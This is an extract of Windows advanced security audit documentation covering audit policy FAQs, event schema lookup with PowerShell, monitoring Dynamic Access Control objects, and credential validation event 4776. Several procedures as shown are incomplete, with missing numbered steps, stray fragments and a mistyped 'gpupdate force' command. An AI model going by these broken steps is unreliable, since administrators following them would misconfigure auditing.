Server 2012 Windows 7, Windows Server 2008 R2, Windows Vista, or Windows Server 2008, you need to enable
the following settings, which track changes to DACLs:
Audit File System subcategory: Enable for success, failure, or success and failure
Audit Authorization Policy Change setting: Enable for success, failure, or success and failure
A SACL with Write and Take ownership permissions: Apply to the object that you want to monitor
In Windows XP and Windows Server 2003, you need to use the Audit policy change subcategory.
How can I roll back security audit policies from the advanced audit
policy to the basic audit policy?
Applying advanced audit policy settings replaces any comparable basic security audit policy settings. If you
subsequently change the advanced audit policy setting to Not configured, you need to complete the following
steps to restore the original basic security audit policy settings:
1. Set all Advanced Audit Policy subcategories to Not configured.
2. Delete all audit.csv files from the %SYSVOL% folder on the domain controller.
3. Reconfigure and apply the basic audit policy settings.
Unless you complete all of these steps, the basic audit policy settings will not be restored.
How can I monitor if changes are made to audit policy settings?

Changes to security audit policies are critical security events. You can use the Audit Audit Policy Change setting
to determine if the operating system generates audit events when the following types of activities take place:
Permissions and audit settings on the audit policy object are changed
The system audit policy is changed
Security event sources are registered or unregistered
Per-user audit settings are changed
The value of CrashOnAuditFail is modified
Audit settings on a file or registry key are changed
A Special Groups list is changed
How can I minimize the number of events that are generated?

Finding the right balance between auditing enough network and computer activity and auditing too little network
and computer activity can be challenging. You can achieve this balance by identifying the most important
resources, critical activities, and users or groups of users. Then design a security audit policy that targets these
resources, activities, and users. Useful guidelines and recommendations for developing an effective security
auditing strategy can be found in Planning and deploying advanced security audit policies.
What are the best tools to model and manage audit policies?
The integration of advanced audit policy settings with domain Group Policy, introduced in Windows 7 and
Windows Server 2008 R2, is designed to simplify the management and implementation of security audit policies
in an organization's network. As such, tools used to plan and deploy Group Policy Objects for a domain can also be
used to plan and deploy security audit policies. On an individual computer, the Auditpol command-line tool can be
used to complete a number of important audit policy–related management tasks.
In addition, there are a number of computer management products, such as the Audit Collection Services in the
Microsoft System Center Operations Manager products, which can be used to collect and filter event data.
Where can I find information about all the possible events that I might
receive?
Users who examine the security event log for the first time can be a bit overwhelmed by the number of audit
events that are stored there (which can quickly number in the thousands) and by the structured information that is
included for each audit event. Additional information about these events, and the settings used to generate them,
can be obtained from the following resources:
Windows 8 and Windows Server 2012 Security Event Details
Security Audit Events for Windows 7 and Windows Server 2008 R2
Security Audit Events for Windows Server 2008 and Windows Vista
Where can I find more detailed information?

To learn more about security audit policies, see the following resources:
Planning and deploying advanced security audit policies
Security Monitoring and Attack Detection Planning Guide
Security Audit Events for Windows 7 and Windows Server 2008 R2
Security Audit Events for Windows Server 2008 and Windows Vista
Which editions of Windows support advanced audit
policy configuration
Applies to
Windows 10
Advanced audit policy configuration is supported on all versions of Windows since it was introduced in Windows
Vista. There is no difference in security auditing support between 32-bit and 64-bit versions. Windows editions
that cannot join a domain, such as Windows 10 Home edition, do not have access to these features.
How to get a list of XML data name elements in
EventData
Applies to
Windows 10
The Security log uses a manifest where you can get all of the event schema.
Run the following from an elevated PowerShell prompt:
$secEvents = get-winevent -listprovider "microsoft-windows-security-auditing"
The .events property is a collection of all of the events listed in the manifest on the local machine.
For each event, there is a .Template property for the XML template used for the event properties (if there are any).
For example:
PS C:\WINDOWS\system32> $SecEvents.events[100]
Id : 4734
Version : 0
LogLink : System.Diagnostics.Eventing.Reader.EventLogLink
Level : System.Diagnostics.Eventing.Reader.EventLevel
Opcode : System.Diagnostics.Eventing.Reader.EventOpcode
Task : System.Diagnostics.Eventing.Reader.EventTask
Keywords : {}
Template : <template xmlns="http://schemas.microsoft.com/win/2004/08/events">
<data name="TargetUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="TargetSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserSid" inType="win:SID" outType="xs:string"/>
<data name="SubjectUserName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectDomainName" inType="win:UnicodeString" outType="xs:string"/>
<data name="SubjectLogonId" inType="win:HexInt64" outType="win:HexInt64"/>
<data name="PrivilegeList" inType="win:UnicodeString" outType="xs:string"/>
</template>
Description : A security-enabled local group was deleted.
Subject:
Security ID: %4
Account Name: %5
Account Domain: %6
Logon ID: %7
Group:
Security ID: %3
Group Name: %1
Group Domain: %2
Additional Information:
Privileges: %8
PS C:\WINDOWS\system32> $SecEvents.events[100].Template
<template xmlns="http://schemas.microsoft.com/win/2004/08/events">
</template>
Mapping data name elements to the names in an event description

You can use the <Template> and <Description> to map the data name elements that appear in XML view to the
names that appear in the event description.
The <Description> is just the format string (if you’re used to Console.Writeline or sprintf statements) and the
<Template> is the source of the input parameters for the <Description>.
Using Security event 4734 as an example:
Template : <template xmlns="http://schemas.microsoft.com/win/2004/08/events">
</template>
Description : A security-enabled local group was deleted.
Subject:
Security ID: %4
Account Name: %5
Account Domain: %6
Logon ID: %7
Group:
Security ID: %3
Group Name: %1
Group Domain: %2
Privileges: %8
For the Subject: Security Id: text element, it will use the fourth element in the Template, SubjectUserSid.
For Additional Information Privileges:, it would use the eighth element PrivilegeList.
A caveat to this is an oft-overlooked property of events called Version (in the <SYSTEM> element) that indicates
the revision of the event schema and description. Most events have 1 version (all events have Version =0 like the
Security/4734 example) but a few events like Security/4624 or Security/4688 have at least 3 versions (versions 0,
1, 2) depending on the OS version where the event is generated. Only the latest version is used for generating
events in the Security log. In any case, the Event Version where the Template is taken from should use the same
Event Version for the Description.
Using advanced security auditing options to monitor
dynamic access control objects
Applies to
Windows 10
This guide explains the process of setting up advanced security auditing capabilities that are made possible
through settings and events that were introduced in Windows 8 and Windows Server 2012.
These procedures can be deployed with the advanced security auditing capabilities described in Deploy Security
Auditing with Central Audit Policies (Demonstration Steps).
In this guide
Domain administrators can create and deploy expression-based security audit policies by using file classification
information (resource attributes), user claims, and device claims to target specific users and resources to monitor
potentially significant activities on one or more computers. These policies can be deployed centrally by using
Group Policy, or directly on a computer, in a folder, or in individual files.
In this section
TOPIC DESCRIPTION
Monitor the central access policies that apply on a file server This topic for the IT professional describes how to monitor
changes to the central access policies that apply to a file
server when using advanced security auditing options to
monitor dynamic access control objects. Central access
policies are created on a domain controller and then applied
to file servers through Group Policy management.
Monitor the use of removable storage devices This topic for the IT professional describes how to monitor
attempts to use removable storage devices to access network
resources. It describes how to use advanced security auditing
options to monitor dynamic access control objects.
Monitor resource attribute definitions This topic for the IT professional describes how to monitor
changes to resource attribute definitions when you are using
advanced security auditing options to monitor dynamic
access control objects.
Monitor central access policy and rule definitions This topic for the IT professional describes how to monitor
changes to central access policy and central access rule
definitions when you use advanced security auditing options
to monitor dynamic access control objects.
Monitor user and device claims during sign-in This topic for the IT professional describes how to monitor
user and device claims that are associated with a user’s
security token when you are using advanced security auditing
options to monitor dynamic access control objects.
TOPIC DESCRIPTION
Monitor the resource attributes on files and folders This topic for the IT professional describes how to monitor
attempts to change settings to the resource attributes on files
when you are using advanced security auditing options to
monitor dynamic access control objects.
Monitor the central access policies associated with files and This topic for the IT professional describes how to monitor
folders changes to the central access policies that are associated with
files and folders when you are using advanced security
auditing options to monitor dynamic access control objects.
Monitor claim types This topic for the IT professional describes how to monitor
changes to claim types that are associated with dynamic
access control when you are using advanced security auditing
options.
Important: This procedure can be configured on computers running any of the supported Windows
operating systems. The other monitoring procedures can be configured only as part of a functioning dynamic
access control deployment.
Related topics
Security auditing
Monitor the central access policies that apply on a file
server
Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to the central access policies that apply to a file
server when using advanced security auditing options to monitor dynamic access control objects. Central access
policies are created on a domain controller and then applied to file servers through Group Policy management.
Use the following procedures to configure and verify security auditing settings that are used to monitor changes to
the set of central access policies on a file server. The following procedures assume that you have configured and
deployed dynamic access control, including central access policies, and claims in your network. If you have not yet
deployed dynamic access control in your network, see Deploy a Central Access Policy (Demonstration Steps).
To configure settings to monitor changes to central access policies
1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the flexible access Group Policy Object, and then click Edit.
4. Double-click Computer Configuration, double-click Security Settings, double-click Advanced Audit
Policy Configuration, double-click Policy Change, and then double-click Other Policy Change Events.
Note: This policy setting monitors policy changes that might not be captured otherwise, such as central
access policy changes or trusted platform module configuration changes.
5. Select the Configure the following audit events check box, select the Success check box (and the
Failure check box, if desired), and then click OK.
After you modify the central access policies on the domain controller, verify that the changes have been applied to
the file server and that the proper events are logged.
To verify changes to the central access policies
2. Open the Group Policy Management Console.
3. Right-click Default domain policy, and then click Edit.
4. Double-click Computer Configuration, double-click Policies, and then double-click Windows Settings.
5. Double-click Security Settings, right-click File system, and then click Manage CAPs.
6. In the wizard that appears, follow the instructions to add a new central access policy (CAP ), and then click OK.
7. Use local administrator credentials to sign in to the server that hosts resources that are subject to the central
access policies you changed.
8. Press the Windows key + R, then type cmd to open a Command Prompt window.
Note: If the User Account Control dialog box appears, confirm that the action it displays is what you
want, and then click Yes.
9. Type gpupdate /force, and press ENTER.

10. In Server Manager, click Tools, and then click Event Viewer.
11. Expand Windows Logs, and then click Security. Verify that event 4819 appears in the security log.
Related resource
Using advanced security auditing options to monitor dynamic access control objects
Monitor the use of removable storage devices
Applies to
Windows 10
This topic for the IT professional describes how to monitor attempts to use removable storage devices to access
network resources. It describes how to use advanced security auditing options to monitor dynamic access control
objects.
If you configure this policy setting, an audit event is generated each time a user attempts to copy, move, or save a
resource to a removable storage device.
Use the following procedures to monitor the use of removable storage devices and to verify that the devices are
being monitored.
Note: Your server might function differently based on the version and edition of the operating system that is
installed, your account permissions, and your menu settings.
To configure settings to monitor removable storage devices

3. In the console tree, right-click the flexible access Group Policy Object on the domain controller, and then click
Edit.
4. Double-click Computer Configuration, double-click Security Settings, double-click Advanced Audit Policy
Configuration, double-click Object Access, and then double-click Audit Removable Storage.
5. Select the Configure the following audit events check box, select the Success check box (and the Failure
check box, if desired), and then click OK.
6. If you selected the Failure check box, double-click Audit Handle Manipulation, select the Configure the
following audit events check box, and then select Failure.
7. Click OK, and then close the Group Policy Management Editor.
After you configure the settings to monitor removable storage devices, use the following procedure to verify that
the settings are active.
To verify that removable storage devices are monitored
1. Sign in to the computer that hosts the resources that you want to monitor. Press the Windows key + R, and
then type cmd to open a Command Prompt window.
Note: If the User Account Control dialog box appears, confirm that the action it displays is what you
want, and then click Yes.
2. Type gpupdate /force, and press ENTER.

3. Connect a removable storage device to the targeted computer and attempt to copy a file that is protected with
the Removable Storage Audit policy.
5. Expand Windows Logs, and then click Security.
6. Look for event 4663, which logs successful attempts to write to or read from a removable storage device.
Failures will log event 4656. Both events include Task Category = Removable Storage device.
Key information to look for includes the name and account domain of the user who attempted to access the
file, the object that the user is attempting to access, resource attributes of the resource, and the type of
access that was attempted.
Note: We do not recommend that you enable this category on a file server that hosts file shares on a
removable storage device. When Removable Storage Auditing is configured, any attempt to access the
removable storage device will generate an audit event.
Related resource
Monitor resource attribute definitions
Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to resource attribute definitions when you are
using advanced security auditing options to monitor dynamic access control objects. Resource attribute definitions
define the basic properties of resource attributes, such as what it means for a resource to be defined as “high
business value.” Resource attribute definitions are stored in AD DS under the Resource Properties container.
Changes to these definitions could significantly change the protections that govern a resource, even if the resource
attributes that apply to the resource remain unchanged. Changes can be monitored like any other AD DS object.
For information about monitoring changes to the resource attributes that apply to files, see Monitor the resource
attributes on files and folders.
Use the following procedures to configure settings to monitor changes to resource attribute definitions in AD DS
and to verify the changes. These procedures assume that you have configured and deployed Dynamic Access
Control, including central access policies, claims, and other components, in your network. If you have not yet
deployed Dynamic Access Control in your network, see Deploy a Central Access Policy (Demonstration Steps).
To configure settings to monitor changes to resource attributes

3. In the console tree, right-click the Group Policy Object for the default domain controller, and then click Edit.
4. Double-click Computer Configuration, click Security Settings, expand Advanced Audit Policy
Configuration, expand System Audit Policies, click DS Access, and then double-click Audit directory
service changes.
6. Close the Group Policy Management Editor.
7. Open the Active Directory Administrative Center.
8. Under Dynamic Access Control, right-click Resource Properties, and then click Properties.
9. Click the Security tab, click Advanced to open the Advanced Security Settings dialog box, and then click the
Auditing tab.
10. Click Add, add a security auditing setting for the container, and then close all Security properties dialog boxes.
After you configure settings to monitor changes to resource attributes in AD DS, verify that the changes are being
monitored.
To verify that changes to resource definitions are monitored
3. Under Dynamic Access Control, click Resource Properties, and then double-click a resource attribute.
4. Make changes to this resource attribute.
5. Click OK, and then close the Active Directory Administrative Center.
Related resource
Monitor central access policy and rule definitions
Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to central access policy and central access rule
definitions when you use advanced security auditing options to monitor dynamic access control objects. Central
access policies and rules determine access permissions for multiple files on multiple file servers. Therefore, it is
important to monitor changes to them. Like user claim and device claim definitions, central access policy and rule
definitions reside in Active Directory Domain Services (AD DS ), and they can be monitored just like any other
object in Active Directory. Central access policies and rules are critical elements in a Dynamic Access Control
deployment. These policies and rules are stored in AD DS, so they should be less likely to be tampered with than
other network objects. However, it is important to monitor these objects for potential changes in security auditing
and to verify that policies are being enforced.
Use the following procedures to configure settings to monitor changes to central access policy and central access
rule definitions and to verify the changes. These procedures assume that you have configured and deployed
Dynamic Access Control, including central access policies, claims, and other components, in your network. If you
have not yet deployed Dynamic Access Control in your network, see Deploy a Central Access Policy
(Demonstration Steps).
To configure settings to monitor changes to central access policy and rule definitions
3. In the console tree, right-click the default domain controller Group Policy Object, and then click Edit.
service changes.
8. Under Dynamic Access Control, right-click Central Access Policies, and then select Properties.
Auditing tab.
After you configure settings to monitor changes to central access policy and central access rule definitions, verify
that the changes are being monitored.
To verify that changes to central access policy and rule definitions are monitored
3. Under Dynamic Access Control, right-click Central Access Policies, and then click Properties.
Auditing tab.
6. In the Central Access Policies container, add a new central access policy (or select one that exists), click
Properties in the Tasks pane, and then change one or more attributes.
7. Click OK, and then close the Active Directory Administrative Center.
Related resource
Monitor user and device claims during sign-in
Applies to
Windows 10
This topic for the IT professional describes how to monitor user and device claims that are associated with a user’s
security token when you are using advanced security auditing options to monitor dynamic access control objects.
Device claims are associated with the system that is used to access resources that are protected with Dynamic
Access Control. User claims are attributes that are associated with a user. User claims and device claims are
included in the user’s security token used at sign-on. For example, information about Department, Company,
Project, or Security clearances might be included in the token.
Use the following procedures to monitor changes to user claims and device claims in the user’s sign-on token and
to verify the changes. These procedures assume that you have configured and deployed Dynamic Access Control,
including central access policies, claims, and other components, in your network. If you have not yet deployed
Dynamic Access Control in your network, see Deploy a Central Access Policy (Demonstration Steps).
To monitor user and device claims in user logon token

Configuration, expand System Audit Policies, click Logon/Logoff, and then double-click Audit
User/Device claims.
After you configure settings to monitor user and device claims, verify that the changes are being monitored.
To verify that user and device claims in user logon token are monitored
1. With local administrator credentials, sign in to a file server that is subject to the flexible access Group Policy
Object.
2. Open an elevated command prompt, and run the following command:
gpupdate force
3. From a client computer, connect to a file share on the file server as a user who has access permissions to the
file server.
4. On the file server, open Event Viewer, expand Windows Logs, and select the Security log. Look for event
4626, and confirm that it contains information about user claims and device claims.
Related resource
Monitor the resource attributes on files and folders
Applies to
Windows 10
This topic for the IT professional describes how to monitor attempts to change settings to the resource attributes
on files when you are using advanced security auditing options to monitor dynamic access control objects.
If your organization has a carefully thought out authorization configuration for resources, changes to these
resource attributes can create potential security risks. Examples include:
Changing files that have been marked as high business value to low business value.
Changing the Retention attribute of files that have been marked for retention.
Changing the Department attribute of files that are marked as belonging to a particular department.
Use the following procedures to configure settings to monitor changes to resource attributes on files and folders.
These procedures assume that have configured and deployed central access policies in your network. For more
information about how to configure and deploy central access policies, see Dynamic Access Control: Scenario
Overview .
To monitor changes to resource attributes on files

4. Double-click Computer Configuration, double-click Security Settings, double-click Advanced Audit
Policy Configuration, double-click Policy Change, and then double-click Audit Authorization Policy
Change.
5. Select the Configure the following audit events check box, select the Success and Failure check boxes, and
then click OK.
After you configure settings to monitor resource attributes on files, verify that the changes are being monitored.
To verify that changes to resource attributes on files are monitored
1. Use administrator credentials to sign in to the server that hosts the resource you want to monitor.
2. From an elevated command prompt, type gpupdate /force, and then press ENTER.
3. Attempt to change resource properties on one or more files and folders.
6. Depending on which resource attributes you attempted to change, you should look for the following events:
Event 4911, which tracks changes to file attributes
Event 4913, which tracks changes to central access policies
Key information to look for includes the name and account domain of the principal attempting to change the
resource attribute, the object that the principal is attempting to modify, and information about the changes
that are being attempted.
Related resource
Monitor the central access policies associated with
files and folders
Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to the central access policies that are
associated with files and folders when you are using advanced security auditing options to monitor dynamic access
control objects.
This security audit policy and the event that it records are generated when the central access policy that is
associated with a file or folder is changed. This security audit policy is useful when an administrator wants to
monitor potential changes on some, but not all, files and folders on a file server.
For info about monitoring potential central access policy changes for an entire file server, see Monitor the central
access policies that apply on a file server.
Use the following procedures to configure settings to monitor central access policies that are associated with files.
These procedures assume that you have configured and deployed Dynamic Access Control in your network. For
more information about how to configure and deploy Dynamic Access Control, see Dynamic Access Control:
Scenario Overview.
To configure settings to monitor central access policies associated with files or folders
4. Double-click Computer Configuration, double-click Security Settings, double-click Advanced Audit Policy
Configuration, double-click Policy Change, and then double-click Audit Authorization Policy Change.
6. Enable auditing for a file or folder as described in the following procedure.
To enable auditing for a file or folder
1. Sign in as a member of the local administrators group on the computer that contains the files or folders that
you want to audit.
2. Right-click the file or folder, click Properties, and then click the Security tab.
3. Click Advanced, click the Auditing tab, and then click Continue.
If the User Account Control dialog box appears, confirm that the action it displays is what you want, and
then click Yes.
4. Click Add, click Select a principal, type a user name or group name in the format contoso\user1, and
then click OK.
5. In the Auditing Entry for dialog box, select the permissions that you want to audit, such as Full Control or
Delete.
6. Click OK four times to complete the configuration of the object SACL.
7. Open a File Explorer window and select or create a file or folder to audit.
8. Open an elevated command prompt, and run the following command:
gpupdate /force
After you configure settings to monitor changes to the central access policies that are associated with files and
folders, verify that the changes are being monitored.
To verify that changes to central access policies associated with files and folders are monitored
1. Sign in as a member of the local administrators group on the computer that contains the files or folders that
you want to audit.
2. Open a File Explorer window and select the file or folder that you configured for auditing in the previous
procedure.
3. Right-click the file or folder, click Properties, click the Security tab, and then click Advanced.
4. Click the Central Policy tab, click Change, and select a different central access policy (if one is available) or
select No Central Access Policy, and then click OK twice.
Note: You must select a setting that is different than your original setting to generate the audit event.

7. Look for event 4913, which is generated when the central access policy that is associated with a file or folder is
changed. This event includes the security identifiers (SIDs) of the old and new central access policies.
Related resource
Monitor claim types
Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to claim types that are associated with dynamic
access control when you are using advanced security auditing options.
Claim types are one of the basic building blocks of Dynamic Access Control. Claim types can include attributes
such as the departments in an organization or the levels of security clearance that apply to classes of users. You can
use security auditing to track whether claims are added, modified, enabled, disabled, or deleted.
Use the following procedures to configure settings to monitor changes to claim types in AD DS. These procedures
assume that you have configured and deployed Dynamic Access Control, including central access policies, claims,
and other components, in your network. If you have not yet deployed Dynamic Access Control in your network,
see Deploy a Central Access Policy (Demonstration Steps).
To configure settings to monitor changes to claim types

1. Sign in to your domain controller by using domain administrator credential.
3. In the console tree, right-click the default domain controller Group Policy Object, and then click Edit.
service changes.
5. Select the Configure the following audit events check box, select the Success check box (andthe Failure
After you configure settings to monitor changes to claim types in AD DS, verify that the changes are being
monitored.
To verify that changes to claim types are monitored
3. Under Dynamic Access Control, right-click Claim Types, and then click Properties.
Auditing tab.
5. Click Add, add a security auditing setting for the container, and then close all the Security properties dialog
boxes.
6. In the Claim Types container, add a new claim type or select an existing claim type. In the Tasks pane, click
Properties, and then change one or more attributes.
Click OK, and then close the Active Directory Administrative Center.
7. Open Event Viewer on this domain controller, expand Windows Logs, and select the Security log.
Look for event 5137. Key information to look for includes the name of the new attribute that was added, the
type of claim that was created, and the user who created the claim.
Related resource
Applies to
Windows 10
This reference for IT professionals provides information about the advanced audit policy settings that are
available in Windows and the audit events that they generate.
The security audit policy settings under Security Settings\Advanced Audit Policy Configuration can help
your organization audit compliance with important business-related and security-related rules by tracking
precisely defined activities, such as:
A group administrator has modified settings or data on servers that contain finance information.
An employee within a defined group has accessed an important file.
The correct system access control list (SACL ) is applied to every file and folder or registry key on a computer
or file share as a verifiable safeguard against undetected access.
You can access these audit policy settings through the Local Security Policy snap-in (secpol.msc) on the local
computer or by using Group Policy.
These advanced audit policy settings allow you to select only the behaviors that you want to monitor. You can
exclude audit results for behaviors that are of little or no concern to you, or behaviors that create an excessive
number of log entries. In addition, because security audit policies can be applied by using domain Group Policy
Objects, audit policy settings can be modified, tested, and deployed to selected users and groups with relative
simplicity. Audit policy settings under Security Settings\Advanced Audit Policy Configuration are available
in the following categories:
Account Logon
Configuring policy settings in this category can help you document attempts to authenticate account data on a
domain controller or on a local Security Accounts Manager (SAM ). Unlike Logon and Logoff policy settings and
events, which track attempts to access a particular computer, settings and events in this category focus on the
account database that is used. This category includes the following subcategories:
Audit Credential Validation
Account Management
The security audit policy settings in this category can be used to monitor changes to user and computer accounts
and groups. This category includes the following subcategories:
Detailed Tracking
Detailed Tracking security policy settings and audit events can be used to monitor the activities of individual
applications and users on that computer, and to understand how a computer is being used. This category includes
the following subcategories:
Audit PNP activity
Audit RPC Events
DS Access
DS Access security audit policy settings provide a detailed audit trail of attempts to access and modify objects in
Active Directory Domain Services (AD DS ). These audit events are logged only on domain controllers. This
category includes the following subcategories:
Logon/Logoff
Logon/Logoff security policy settings and audit events allow you to track attempts to log on to a computer
interactively or over a network. These events are particularly useful for tracking user activity and identifying
potential attacks on network resources. This category includes the following subcategories:
Audit Logoff
Audit Logon
Audit Special Logon
Object Access
Object Access policy settings and audit events allow you to track attempts to access specific objects or types of
objects on a network or computer. To audit attempts to access a file, directory, registry key, or any other object,
you must enable the appropriate object Aaccess auditing subcategory for success and/or failure events. For
example, the file system subcategory needs to be enabled to audit file operations, and the Registry subcategory
needs to be enabled to audit registry accesses.
Proving that these audit policies are in effect to an external auditor is more difficult. There is no easy way to verify
that the proper SACLs are set on all inherited objects. To address this issue, see Global Object Access Auditing.
This category includes the following subcategories:
Audit File Share
Audit File System
Audit Kernel Object
Audit Registry
Audit SAM
Policy Change
Policy Change audit events allow you to track changes to important security policies on a local system or
network. Because policies are typically established by administrators to help secure network resources,
monitoring changes or attempts to change these policies can be an important aspect of security management for
a network. This category includes the following subcategories:
Audit Filtering Platform Policy Change
Audit MPSSVC Rule-Level Policy Change
Audit Other Policy Change Events
Privilege Use
Permissions on a network are granted for users or computers to complete defined tasks. Privilege Use security
policy settings and audit events allow you to track the use of certain permissions on one or more systems. This
category includes the following subcategories:
Audit Non-Sensitive Privilege Use
Audit Sensitive Privilege Use
Audit Other Privilege Use Events
System
System security policy settings and audit events allow you to track system-level changes to a computer that are
not included in other categories and that have potential security implications. This category includes the following
subcategories:
Audit IPsec Driver
Audit Other System Events
Audit Security State Change
Audit Security System Extension
Audit System Integrity
Global Object Access Auditing

Global Object Access Auditing policy settings allow administrators to define computer system access control lists
(SACLs) per object type for the file system or for the registry. The specified SACL is then automatically applied to
every object of that type. Auditors will be able to prove that every resource in the system is protected by an audit
policy by viewing the contents of the Global Object Access Auditing policy settings. For example, if auditors see a
policy setting called "Track all changes made by group administrators," they know that this policy is in effect.
Resource SACLs are also useful for diagnostic scenarios. For example, setting the Global Object Access Auditing
policy to log all the activity for a specific user and enabling the policy to track "Access denied" events for the file
system or registry can help administrators quickly identify which object in a system is denying a user access.
Note: If a file or folder SACL and a Global Object Access Auditing policy setting (or a single registry setting
SACL and a Global Object Access Auditing policy setting) are configured on a computer, the effective SACL is
derived from combining the file or folder SACL and the Global Object Access Auditing policy. This means that
an audit event is generated if an activity matches the file or folder SACL or the Global Object Access Auditing
policy.
This category includes the following subcategories:

File System (Global Object Access Auditing)
Registry (Global Object Access Auditing)
Audit Credential Validation
Applies to
Windows 10
Windows Server 2016
Audit Credential Validation determines whether the operating system generates audit events on credentials that
are submitted for a user account logon request.
These events occur on the computer that is authoritative for the credentials as follows:
For domain accounts, the domain controller is authoritative.
For local accounts, the local computer is authoritative.
Event volume:
High on domain controllers.
Low on member servers and workstations.
Because domain accounts are used much more frequently than local accounts in enterprise environments, most of
the Account Logon events in a domain environment occur on the domain controllers that are authoritative for the
domain accounts. However, these events can occur on any computer, and they may occur in conjunction with or on
separate computers from Logon and Logoff events.
The main reason to enable this auditing subcategory is to handle local accounts authentication attempts and, for
domain accounts, NTLM authentication in the domain. It is especially useful for monitoring unsuccessful attempts,
to find brute-force attacks, account enumeration, and potential account compromise events on domain controllers.
STRONGER STRONGER
COMPUTER TYPE GENERAL SUCCESS GENERAL FAILURE SUCCESS FAILURE COMMENTS
STRONGER STRONGER
Domain IF Yes Yes Yes Expected volume

Controller of events is high
for domain
controllers,
because this
subcategory will
generate events
when an
authentication
attempt is made
using any
domain account
and NTLM
authentication.
IF – We
recommend
Success auditing
to keep track of
domain-account
authentication
events using the
NTLM protocol.
Expect a high
volume of events.
For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections. Just
collecting Success
auditing events
in this
subcategory for
future use in case
of a security
incident is not
very useful,
because events in
this subcategory
are not always
informative.
We recommend
Failure auditing,
to collect
information
about failed
authentication
attempts using
domain accounts
and the NTLM
authentication
protocol.
STRONGER STRONGER
Member Server Yes Yes Yes Yes Expected volume

of events is low
for member
servers, because
this subcategory
will generate
events when an
authentication
attempt is made
using a local
account, which
should not
happen too
often.
We recommend
Success auditing,
to keep track of
authentication
events by local
accounts.
We recommend
Failure auditing,
to collect
information
about failed
authentication
attempts by local
accounts.
Workstation Yes Yes Yes Yes Expected volume

of events is low
for workstations,
because this
subcategory will
generate events
when an
authentication
attempt is made
using a local
account, which
should not
happen too
often.
We recommend
Success auditing,
to keep track of
authentication
events by local
accounts.
We recommend
Failure auditing,
to collect
information
about failed
authentication
attempts by local
accounts.
Events List:
4774(S, F ): An account was mapped for logon.
4775(F ): An account could not be mapped for logon.
4776(S, F ): The computer attempted to validate the credentials for an account.
4777(F ): The domain controller failed to validate the credentials for an account.
4774(S, F): An account was mapped for logon.
Applies to
Windows 10
Windows Server 2016
Success events do not appear to occur. Failure event has been reported.
Subcategory: Audit Credential Validation
Event Schema:
An account was mapped for logon.
Authentication Package:Schannel
Account UPN:<Acccount>@<Domain>
Mapped Name:<Account>
Required Server Roles: no information.
Minimum OS Version: no information.
Event Versions: 0.
Security Monitoring Recommendations

There is no recommendation for this event in this document.
4775(F): An account could not be mapped for logon.
Applies to
Windows 10
Windows Server 2016
It appears that this event never occurs.
Event Schema:
An account could not be mapped for logon.
Authentication Package:%1
Account Name:%2
Event Versions: 0.

4776(S, F): The computer attempted to validate the
credentials for an account.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time that a
credential validation occurs using NTLM
authentication.
This event occurs only on the computer that
is authoritative for the provided credentials.
For domain accounts, the domain controller
is authoritative. For local accounts, the local
computer is authoritative.
It shows successful and unsuccessful
credential validation attempts.
It shows only the computer name (Source Workstation) from which the authentication attempt was performed
(authentication source). For example, if you authenticate from CLIENT-1 to SERVER -1 using a domain account
you will see CLIENT-1 in the Source Workstation field. Information about the destination computer (SERVER -1)
is not presented in this event.
If a credential validation attempt fails, you will see a Failure event with Error Code parameter value not equal to
“0x0”.
The main advantage of this event is that on domain controllers you can see all authentication attempts for domain
accounts when NTLM authentication was used.
For monitoring local account logon attempts, it is better to use event “4624: An account was successfully logged
on” because it contains more details and is more informative.
This event also generates when a workstation unlock event occurs.
This event does not generate when a domain account logs on locally to a domain controller.
Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4776</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14336</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-07-25T04:38:11.003163100Z" />
<EventRecordID>165437</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="532" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="PackageName">MICROSOFT\_AUTHENTICATION\_PACKAGE\_V1\_0</Data>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="Workstation">WIN81</Data>
<Data Name="Status">0xc0000234</Data>
</EventData>
</Event>
Required Server Roles: no specific requirements.

Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Authentication Package [Type = UnicodeString]: the name of Authentication Package which was used for
credential validation. It is always “MICROSOFT_AUTHENTICATION_PACKAGE_V1_0” for 4776 event.
Note Authentication package is a DLL that encapsulates the authentication logic used to determine
whether to permit a user to log on. Local Security Authority (LSA) authenticates a user logon by sending the
request to an authentication package. The authentication package then examines the logon information and
either authenticates or rejects the user logon attempt.
Logon Account [Type = UnicodeString]: the name of the account that had its credentials validated by the
Authentication Package. Can be user name, computer account name or well-known security principal
account name. Examples:
User example: dadmin
Computer account example: WIN81$
Local System account example: Local
Local Service account example: Local Service
Source Workstation [Type = UnicodeString]: the name of the computer from which the logon attempt
originated.
Error Code [Type = HexInt32]: contains error code for Failure events. For Success events this parameter
has “0x0” value. The table below contains most common error codes for this event:
ERROR CODE DESCRIPTION
0xC0000064 The username you typed does not exist. Bad username.
0xC000006A Account logon with misspelled or bad password.
0xC000006D - Generic logon failure.

Some of the potential causes for this:
An invalid username and/or password was used
LAN Manager Authentication Level mismatch between the
source and target computers.
0xC000006F Account logon outside authorized hours.
0xC0000070 Account logon from unauthorized workstation.
0xC0000071 Account logon with expired password.
0xC0000072 Account logon to account disabled by administrator.
0xC0000193 Account logon with expired account.
0xC0000224 Account logon with "Change Password at Next Logon"

